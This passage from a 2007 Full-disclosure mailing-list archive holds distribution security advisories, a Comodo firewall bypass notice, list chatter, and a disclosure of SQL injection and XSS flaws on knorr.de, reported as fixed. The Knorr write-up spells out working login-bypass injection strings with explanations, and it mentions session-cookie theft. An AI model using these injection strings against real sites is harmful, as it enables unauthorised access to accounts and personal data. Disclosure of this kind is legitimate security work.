SaMuschie Research Labs was found to publish | vulnerabilities within well known software products, | which are easy to discover and exploit. | | SaMuschie researchers just spend a minimum of time | and knowledge for each vulnerability. Hence readers of | this advisory are requested not to ask any questions | to the researchers.... they don't know the answer ;) +---------------------------------- - -- - - -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFF5tLFMFgfGpQK8VERAgphAJ4qvuCfLYTWO6pluhlm92gSlZz5AQCeINsc rYF05IF5Rztw2+FzaqhUyA4= =sQNU -----END PGP SIGNATURE----- ___________________________________________________________ Der fr?he Vogel f?ngt den Wurm. Hier gelangen Sie zum neuen Yahoo! Mail: http://mail.yahoo.de From prb at lava.net Thu Mar 1 19:06:48 2007 From: prb at lava.net (Peter Besenbruch) Date: Thu, 01 Mar 2007 09:06:48 -1000 Subject: [Full-disclosure] Stealing Browser History Without Using JavaScript In-Reply-To: <45E68A2E.7030309@gatech.edu> References: <6905b1570702280843h2d29b8ddl5b5efe065b62a8a2@mail.gmail.com> <45E68A2E.7030309@gatech.edu> Message-ID: <45E72448.2030706@lava.net> Matthew Flaschen wrote: > "We all know there are still people out there who think turning off > JavaScript protects them from everything." It protects from an awful lot, and so far, from the worst stuff. > Damn it... Good job. I guess NoScript isn't good enough anymore... I couldn't get the demo to work over here, because of the Safe History extension. For reference, I'll put out the links for Safe History, Safe Cache, and Noscript: https://addons.mozilla.org/firefox/1502/ https://addons.mozilla.org/firefox/1474/ https://addons.mozilla.org/firefox/722/ And I agree with you, RSnake did well. -- Hawaiian Astronomical Society: http://www.hawastsoc.org HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky From don.bailey at gmail.com Thu Mar 1 21:58:56 2007 From: don.bailey at gmail.com (don bailey) Date: Thu, 01 Mar 2007 14:58:56 -0700 Subject: [Full-disclosure] Angel LMS 7.1 - Remote SQL Injection In-Reply-To: <814b9d50703010933y6707d716r903df4e337941757@mail.gmail.com> References: <20070301160606.20961.qmail@securityfocus.com> <814b9d50703010933y6707d716r903df4e337941757@mail.gmail.com> Message-ID: <45E74CA0.1060207@gmail.com> Oops, sorry for the cross post. Wasn't paying attention to the folder. From research at matousec.com Thu Mar 1 10:40:40 2007 From: research at matousec.com (Matousec - Transparent security Research) Date: Thu, 01 Mar 2007 11:40:40 +0100 Subject: [Full-disclosure] Comodo Bypassing settings protection using magic pipe Vulnerability Message-ID: <45E6ADA8.50407@matousec.com> Hello, We would like to inform you about a vulnerability in Comodo Firewall Pro. Description: Comodo Firewall Pro (former Comodo Personal Firewall) stores some of its internal settings in the registry key HKLM\SYSTEM\Software\Comodo\Personal Firewall. This key is protected by Comodo drivers such that other applications are not able to change the settings. This protection can be bypassed if very special conditions are met. CFP internally uses a named pipe, which name varies, but can be always determined. A process that opens this pipe many times is able to manipulate the protected settings of CFP. A proper modification of the settings will disable all protection mechanisms implemented by CFP after a reboot. Vulnerable software: * Comodo Firewall Pro 2.4.18.184 * Comodo Firewall Pro 2.4.17.183 * Comodo Firewall Pro 2.4.16.174 * Comodo Personal Firewall 2.3.6.81 * probably all older versions of Comodo Personal Firewall 2 * possibly older versions of Comodo Personal Firewall More details and a proof of concept including its source code are available here: http://www.matousec.com/info/advisories/Comodo-Bypassing-settings-protection-using-magic-pipe.php Regards, -- Matousec - Transparent security Research http://www.matousec.com/ From don.bailey at gmail.com Thu Mar 1 21:52:20 2007 From: don.bailey at gmail.com (don bailey) Date: Thu, 01 Mar 2007 14:52:20 -0700 Subject: [Full-disclosure] Angel LMS 7.1 - Remote SQL Injection In-Reply-To: <814b9d50703010933y6707d716r903df4e337941757@mail.gmail.com> References: <20070301160606.20961.qmail@securityfocus.com> <814b9d50703010933y6707d716r903df4e337941757@mail.gmail.com> Message-ID: <45E74B14.3070406@gmail.com> > http://www.milw0rm.com/exploits/3390 > > Plagiarism sucks. So does altering source code before you post it on your website. http://kernelspace.us/itheft.c http://www.milw0rm.com/exploits/3383 From falco at gentoo.org Fri Mar 2 00:35:08 2007 From: falco at gentoo.org (Raphael Marichez) Date: Fri, 2 Mar 2007 01:35:08 +0100 Subject: [Full-disclosure] [ GLSA 200703-03 ] ClamAV: Denial of Service Message-ID: <20070302003508.GJ14157@falco.falcal.net> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200703-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: ClamAV: Denial of Service Date: March 02, 2007 Bugs: #167201 ID: 200703-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== ClamAV contains two vulnerabilities allowing a Denial of Service. Background ========== ClamAV is a GPL virus scanner. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-antivirus/clamav < 0.90 >= 0.90 Description =========== An anonymous researcher discovered a file descriptor leak error in the processing of CAB archives and a lack of validation of the "id" parameter string used to create local files when parsing MIME headers. Impact ====== A remote attacker can send several crafted CAB archives with a zero-length record header that will fill the available file descriptors until no other is available, which will prevent ClamAV from scanning most archives. An attacker can also send an email with specially crafted MIME headers to overwrite local files with the permissions of the user running ClamAV, such as the virus database file, which could prevent ClamAV from detecting any virus. Workaround ========== The first vulnerability can be prevented by refusing any file of type CAB, but there is no known workaround for the second issue. Resolution ========== All ClamAV users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-antivirus/clamav-0.90" References ========== [ 1 ] CVE-2007-0897 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0897 [ 2 ] CVE-2007-0898 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0898 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-03.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 481 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070302/22894e74/attachment.bin From falco at gentoo.org Fri Mar 2 00:33:29 2007 From: falco at gentoo.org (Raphael Marichez) Date: Fri, 2 Mar 2007 01:33:29 +0100 Subject: [Full-disclosure] [ GLSA 200703-02 ] SpamAssassin: Long URI Denial of Service Message-ID: <20070302003329.GH14157@falco.falcal.net> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200703-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: SpamAssassin: Long URI Denial of Service Date: March 02, 2007 Bugs: #166969 ID: 200703-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== SpamAssassin is vulnerable to a Denial of Service attack. Background ========== SpamAssassin is an extensible email filter used to identify junk email. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 mail-filter/spamassassin < 3.1.8 >= 3.1.8 Description =========== SpamAssassin does not correctly handle very long URIs when scanning emails. Impact ====== An attacker could cause SpamAssassin to consume large amounts of CPU and memory resources by sending one or more emails containing very long URIs. Workaround ========== There is no known workaround at this time. Resolution ========== All SpamAssassin users should upgrade to the latest version. # emerge --sync # emerge --ask --oneshot --verbose ">=mail-filter/spamassassin-3.1.8" References ========== [ 1 ] CVE-2007-0451 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0451 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-02.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 481 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070302/d006245d/attachment.bin From falco at gentoo.org Fri Mar 2 00:31:56 2007 From: falco at gentoo.org (Raphael Marichez) Date: Fri, 2 Mar 2007 01:31:56 +0100 Subject: [Full-disclosure] [ GLSA 200703-01 ] Snort: Remote execution of arbitrary code Message-ID: <20070302003156.GF14157@falco.falcal.net> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200703-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Snort: Remote execution of arbitrary code Date: February 23, 2007 Bugs: #167730 ID: 200703-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== The Snort DCE/RPC preprocessor contains a buffer overflow that could result in the remote execution of arbitrary code. Background ========== Snort is a widely deployed intrusion detection program. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-analyzer/snort < 2.6.1.3 >= 2.6.1.3 Description =========== The Snort DCE/RPC preprocessor does not properly reassemble certain types of fragmented SMB and DCE/RPC packets. Impact ====== A remote attacker could send specially crafted fragmented SMB or DCE/RPC packets, without the need to finish the TCP handshake, that would trigger a stack-based buffer overflow while being reassembled. This could lead to the execution of arbitrary code with the permissions of the user running the Snort preprocessor. Workaround ========== Disable the DCE/RPC processor by commenting 'preprocessor rpc_decode' and 'include $RULE_PATH/rpc.rules' from /etc/snort/snort.conf . Resolution ========== All Snort users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/snort-2.6.1.3" References ========== [ 1 ] CVE-2006-5276 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5276 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 481 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070302/fe507690/attachment.bin From str0ke at milw0rm.com Fri Mar 2 03:34:23 2007 From: str0ke at milw0rm.com (str0ke) Date: Thu, 1 Mar 2007 21:34:23 -0600 Subject: [Full-disclosure] Angel LMS 7.1 - Remote SQL Injection In-Reply-To: <45E74B14.3070406@gmail.com> References: <20070301160606.20961.qmail@securityfocus.com> <814b9d50703010933y6707d716r903df4e337941757@mail.gmail.com> <45E74B14.3070406@gmail.com> Message-ID: <814b9d50703011934n78768de6v240af05470da03f@mail.gmail.com> Thank you for the info, code has been updated. /str0ke On 3/1/07, don bailey wrote: > > > http://www.milw0rm.com/exploits/3390 > > > > Plagiarism sucks. > > So does altering source code before you post it on your website. > > http://kernelspace.us/itheft.c > http://www.milw0rm.com/exploits/3383 > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From kees at ubuntu.com Fri Mar 2 05:42:16 2007 From: kees at ubuntu.com (Kees Cook) Date: Thu, 1 Mar 2007 21:42:16 -0800 Subject: [Full-disclosure] [USN-428-2] Firefox regression Message-ID: <20070302054216.GX27137@outflux.net> =========================================================== Ubuntu Security Notice USN-428-2 March 02, 2007 firefox regression https://launchpad.net/bugs/88990 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: firefox 1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2 libnspr4 1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2 libnss3 1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2 After a standard system upgrade you need to restart Firefox to effect the necessary changes. Details follow: USN-428-1 fixed vulnerabilities in Firefox 1.5. However, changes to library paths caused applications depending on libnss3 to fail to start up. This update fixes the problem. We apologize for the inconvenience. Original advisory details: Several flaws have been found that could be used to perform Cross-site scripting attacks. A malicious web site could exploit these to modify the contents or steal confidential data (such as passwords) from other opened web pages. (CVE-2006-6077, CVE-2007-0780, CVE-2007-0800, CVE-2007-0981, CVE-2007-0995, CVE-2007-0996) The SSLv2 protocol support in the NSS library did not sufficiently check the validity of public keys presented with a SSL certificate. A malicious SSL web site using SSLv2 could potentially exploit this to execute arbitrary code with the user's privileges. (CVE-2007-0008) The SSLv2 protocol support in the NSS library did not sufficiently verify the validity of client master keys presented in an SSL client certificate. A remote attacker could exploit this to execute arbitrary code in a server application that uses the NSS library. (CVE-2007-0009) Various flaws have been reported that could allow an attacker to execute arbitrary code with user privileges by tricking the user into opening a malicious web page. (CVE-2007-0775, CVE-2007-0776, CVE-2007-0777, CVE-2007-1092) Two web pages could collide in the disk cache with the result that depending on order loaded the end of the longer document could be appended to the shorter when the shorter one was reloaded from the cache. It is possible a determined hacker could construct a targeted attack to steal some sensitive data from a particular web page. The potential victim would have to be already logged into the targeted service (or be fooled into doing so) and then visit the malicious site. (CVE-2007-0778) David Eckel reported that browser UI elements--such as the host name and security indicators--could be spoofed by using custom cursor images and a specially crafted style sheet. (CVE-2007-0779) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2.diff.gz Size/MD5: 177681 367677dfb9fcdea096afe508f510507a http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2.dsc Size/MD5: 1120 e96bcad4e4a2fdff5e90047442a854e3 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.10.orig.tar.gz Size/MD5: 44679183 d55d439c238064ddcedb8fabb6089ff2 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dev_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_all.deb Size/MD5: 50480 0a9654e29b1e7b315fe7bcde85fe0a82 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/mozilla-firefox_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_all.deb Size/MD5: 51368 f7d7e7df86459c24fa3184da5e723ca3 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_amd64.deb Size/MD5: 47443244 3322fcd458dbfe789ae53e21b86df8be http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_amd64.deb Size/MD5: 2804584 ee33eecb089c532d74c33e544cd5b520 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_amd64.deb Size/MD5: 217432 4ecfe5ce1cd0d9164a2efbb99196f813 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_amd64.deb Size/MD5: 83680 7b22ca5bf3a188e54c2f4d3270cbd0d3 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_amd64.deb Size/MD5: 9439946 eb8e96f2526f59a96713b4d80653062c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_amd64.deb Size/MD5: 220236 b0ce1880afb5c1ee300a1e5c6bbf897c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_amd64.deb Size/MD5: 163584 9cce73f59d74b1a6921ef8004f02cda2 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_amd64.deb Size/MD5: 245562 3681ed65b9380ece582bdcceb2379d8c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_amd64.deb Size/MD5: 823220 54fd6d513754541a455041537876bad8 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_i386.deb Size/MD5: 44006406 98c9c7360e6aaa7eea4ed2c41f273aae http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_i386.deb Size/MD5: 2804456 b2ddd97204d33fdc5b29971e9aa41630 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_i386.deb Size/MD5: 210834 6a1438cbef0a71363d360777bbd3214c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_i386.deb Size/MD5: 76068 e757d313cda5de879e948b42006bcdeb http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_i386.deb Size/MD5: 7948176 735483f66d8c09cdbed8833073456681 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_i386.deb Size/MD5: 220242 baf029d97f703130e0089659614cd2c4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_i386.deb Size/MD5: 148142 7c80067d158d37c8df818fd0e3cb4a50 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_i386.deb Size/MD5: 245558 ef61b1f010f5e30f9e3a2a33f5c3b091 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_i386.deb Size/MD5: 714774 1065d82a9d13e98b060e8a60821aaa37 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_powerpc.deb Size/MD5: 48834962 4b279b424dc69b2c92098565bc2f0e1e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_powerpc.deb Size/MD5: 2804560 51e13ae6b8e853b5a9a4f4a19e6a4c14 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_powerpc.deb Size/MD5: 214292 1de8eb20071f34ffb73ea7bbb3b6b871 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_powerpc.deb Size/MD5: 79184 16dccd3a9ba2ed7c296c45e3dff1ab23 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_powerpc.deb Size/MD5: 9056418 341caadcba7c536c098e8681b7d7231e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_powerpc.deb Size/MD5: 220234 f714ff5289e79c24207280050a3b4789 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_powerpc.deb Size/MD5: 160792 b22e2fb7cbd6a0f31cb88f6439377450 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_powerpc.deb Size/MD5: 245554 03de410c16cd2c55d8e96f3ec85c1e5c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_powerpc.deb Size/MD5: 813842 480783e72a753672776826165d343f15 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_sparc.deb Size/MD5: 45406734 13357d5f6bfaca2a9f7805e9d2374229 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_sparc.deb Size/MD5: 2804586 82083b797e91c7169135ecd5b56b4a8e http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_sparc.deb Size/MD5: 211778 a97cf3939728dd25381a0d8dd01136c1 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_sparc.deb Size/MD5: 77622 2a41ddbdecba4d40777039b393dcb449 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_sparc.deb Size/MD5: 8445612 8029b90d13fa8d3f2042c0881afbe7d1 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_sparc.deb Size/MD5: 220242 3af481ef99ecb57a525c7585390958ef http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_sparc.deb Size/MD5: 150638 1383f7c03bf481b21d309ae32867969a http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_sparc.deb Size/MD5: 245538 767e66d0dca9b83daab8bc64a8ba2cb8 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_sparc.deb Size/MD5: 725272 dc459aad615df84f3dab766757491c25 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070301/20d53f15/attachment.bin From dudevanwinkle at gmail.com Thu Mar 1 22:13:59 2007 From: dudevanwinkle at gmail.com (Dude VanWinkle) Date: Thu, 1 Mar 2007 17:13:59 -0500 Subject: [Full-disclosure] March 2nd Chicago 2600/DefCon 312 Meeting Information In-Reply-To: <28326b7c0702281412m607ff66av76c67652cb3763ef@mail.gmail.com> References: <28326b7c0702281412m607ff66av76c67652cb3763ef@mail.gmail.com> Message-ID: Does anyone know if there is a NYC 2600 group? I checked the site, but couldnt find any listings.. -JP On 2/28/07, Steven McGrath wrote: > The March Chicago 2600 Meeting is near! The meeting will be Friday, > March 2nd at the Neighborhood Boys and Girls Club and will feature much > of the same usual fun that all of you have grown to expect! > > [Presentation Information] > - 9:00pm - Hacklab: Current Progress (Maniac, et al.) > - 10:00pm - How to build a public server (Maniac) > - After hours - Wii, Music, Socializing, etc. > > [General Information] > - Meeting Time: 7.00pm - Approx. 3-5am > - Meeting Date: Friday, March 2nd > - Place : 2501 W Irving Park Road, Chicago > - More Info : http://chicago2600.net > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From sniffikins at yahoo.com Fri Mar 2 08:20:14 2007 From: sniffikins at yahoo.com (Jaime Demetur) Date: Fri, 2 Mar 2007 00:20:14 -0800 (PST) Subject: [Full-disclosure] G.R.I.D.S. virus being spread by the Younger Woolwich Boyz Message-ID: <803176.31923.qm@web58904.mail.re1.yahoo.com> http://www.encyclopediadramatica.com/index.php/Younger_Woolwich_Boyz be careful out there folks, Jamie --------------------------------- Looking for earth-friendly autos? Browse Top Cars by "Green Rating" at Yahoo! Autos' Green Center. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070302/596ad1dc/attachment.html From sbauer at gjl-network.net Fri Mar 2 09:23:25 2007 From: sbauer at gjl-network.net (sbauer at gjl-network.net) Date: Fri, 2 Mar 2007 10:23:25 +0100 Subject: [Full-disclosure] Knorr.de SQL Injection and XSS Vulnerabilities Message-ID: <20070302102325.2admma4uco4kg488@www.gjl-network.net> Author: Sebastian Bauer Web: http://blog.gjl-network.net Date: 01/12/07 Vuln. website: http://www.knorr.de Vulnerability: SQL Injection (mainly login authentication bypass + any other SQL inj. possibility), XSS Significance: Very Critical --------------------------------------------------------- Detailed description: The site knorr.de is using a MS SQL database server and IIS as web server. The programming language used is ASP (Active Server Pages). There is a vulnerability using the login field of the site. Since user input will not be escpaed, it is vulnerable against SQL injection attacks. The SQL string to authenticate the user can be escaped using single quotes. Since the database server is MS SQL it is possible to easily create a valid SQL query and ignore the rest of the SQL query by adding ;-- which ends the current query and defines the rest as comment. There are several ways to bypass the authentication: 1.) Provide a SQL query that will be always true. In this case the system selects the first possible user (which seems to be admin but without any special privilegues, as there is no real CMS behind this). An attack like this would be: Username: -1' or 'x'='x Password: -1' or 'x'='x This will log you in as the user "holgi" which seems to be the first user within the user table. The -1' will be required to be sure, that the result of this query (WHERE username = '-1') will be false! The first quote is used to escape from the condition given to the SQL database. The next condition 'x'='x will make sure, that the condition fits on any record. We don't provide a closing quote and use the already existing one in the original statement to keep a valid SQL syntax. 2.) Provide a SQL query that will provide a special username as result. Example: Username: -1' or username = 'anyUserName';-- Password: This will result that the query returns the record of the user 'anyUserName' if it exists. To tell MS SQL that this is the complete statement we put the ; and a -- afterwards, to tell it, that the rest of the statement which is inside the code will be handled as comment and thus not to be interpreted. We have to deliver at least one character for the password field, because otherwise the website suggests us to create a new user and does not log us in. 3.) Provide a SQL query that will provide a username which fits a special search condition. This is just a small modification of the 2nd query, which makes us possible to guess usernames. Example: Username: -1' or username LIKE '%anySearchCondition%';-- Password: This will do a normal SQL LIKE condition. You can vary it as you want. You'll get the first possible result as your login. 4.) It is also possible to manually insert new data into the database, receive information about the server and get access to a SQL shell. Those will not be described more closely in this document, as all neccessary information required for this are not a miracle for anyone knowing what he is doing. Cross-Site Scripting (XSS) Vulnerabilities: Knorr.de is using some kind of a content loader using URL parameter which is vulnerable against XSS attacks. This has not been tested in detail and thus will not described in deep in this document. Also form data used for the Knorr forum will not be escaped what causes the website to offer complete freedom for using XSS inside the forum. But since this is a moderated forum this issue can be rated as a low security risk, though it could be possible to steal the session cookie of an administrator reading an infected entry to confirm or deny it and hijack the session afterwards. --------------------------------------------------------- Resumee: This login authentication is highly significant as it is possible to login as every user we want. Knorr.de is not a website, holding strictly confidential information, but you will get access to personal user data. There may also be a risk to the system itself as it is possible to have nearly full access to the database to delete records, tables or even get access to a SQL shell. All problems found have been discussed with Unilever, the mother company of Knorr and have been fixed before the release of this document. From nytrokiss at gmail.com Thu Mar 1 09:17:59 2007 From: nytrokiss at gmail.com (James Matthews) Date: Thu, 1 Mar 2007 04:17:59 -0500 Subject: [Full-disclosure] March 2nd Chicago 2600/DefCon 312 Meeting Information In-Reply-To: <28326b7c0702281412m607ff66av76c67652cb3763ef@mail.gmail.com> References: <28326b7c0702281412m607ff66av76c67652cb3763ef@mail.gmail.com> Message-ID: <8a6b8e350703010117s318990ev17479411e39d89a8@mail.gmail.com> Great i cannot wait! On 2/28/07, Steven McGrath wrote: > > The March Chicago 2600 Meeting is near! The meeting will be Friday, > March 2nd at the Neighborhood Boys and Girls Club and will feature much > of the same usual fun that all of you have grown to expect! > > [Presentation Information] > - 9:00pm - Hacklab: Current Progress (Maniac, et al.) > - 10:00pm - How to build a public server (Maniac) > - After hours - Wii, Music, Socializing, etc. > > [General Information] > - Meeting Time: 7.00pm - Approx. 3-5am > - Meeting Date: Friday, March 2nd > - Place : 2501 W Irving Park Road, Chicago > - More Info : http://chicago2600.net > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- http://www.goldwatches.com/watches.asp?Brand=39 http://www.wazoozle.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070301/a1d8a3ac/attachment.html From kokanin at gmail.com Fri Mar 2 14:30:29 2007 From: kokanin at gmail.com 